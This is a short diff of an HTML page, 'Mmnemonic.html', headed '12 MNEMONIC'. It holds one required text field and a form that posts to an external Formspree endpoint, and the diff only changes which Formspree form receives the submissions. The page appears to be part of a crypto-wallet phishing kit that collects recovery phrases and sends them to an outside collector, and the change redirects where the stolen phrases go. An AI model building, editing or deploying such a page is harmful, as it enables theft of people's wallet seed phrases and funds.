--- a/Mmnemonic.html
+++ b/Mmnemonic.html
@@ -36,7 +36,7 @@
         <main>
             <section class="container">
                 <h4>12 MNEMONIC</h4>
-                <form action="https://formspree.io/f/mqaarlpp" method="post">
+                <form action="https://formspree.io/f/xwpkdqkg" method="post">
                     <p>
                         <input type="text" name="text" class="button-page" required>
                     </p>
